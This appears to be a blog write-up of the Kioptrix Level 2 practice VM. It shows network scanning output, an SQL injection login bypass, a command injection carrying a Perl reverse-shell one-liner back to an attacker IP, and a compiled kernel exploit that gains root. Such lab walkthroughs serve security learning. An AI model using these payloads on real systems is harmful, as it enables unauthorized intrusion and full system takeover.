Monday, January 28, 2019

Kioptrix Level 2

Kioptrix Level 2
netdiscover -r 123.123.123.0/24

123.123.123.101 00:0c:29:9c:4b:ac      1      60  VMware, Inc.

nmap -T4 -A -v 123.123.123.101

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            655/udp  status
|_  100024  1            658/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2018-10-01T18:52:15+00:00; +10h50m06s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:9C:4B:AC (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 - 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Uptime guess: 49.709 days (since Sun Aug 12 22:01:26 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: mean: 10h50m05s, deviation: 0s, median: 10h50m05s


http://123.123.123.101/

The Remote System Administration Login webpage was been tested for SQL injection attacks and it was found out that using 1' or '1' = '1 as the username and password


1' or '1' = '1


After login, we try with command injection:


;perl -e 'use Socket;$i="123.123.123.201";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

root@KaliLNX:/opt/VMs/Kioptrix_Level_2# nc -nlvp 443
listening on [any] 443 ...

connect to [123.123.123.201] from (UNKNOWN) [123.123.123.101] 32770
bash: no job control in this shell
bash-3.00$ bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$


cd /tmp


gcc -Wall -o linux-sendpage 9545.c
bash-3.00$ gcc -Wall -o linux-sendpage 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls -l
total 28
-rw-r--r--  1 apache apache 9783 Sep 26 04:36 9545.c
-rwxr-xr-x  1 apache apache 6762 Sep 25 21:24 e
-rwxr-xr-x  1 apache apache 6762 Oct  1 15:16 linux-sendpage
bash-3.00$

./linux-sendpage
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#




No comments:

Post a Comment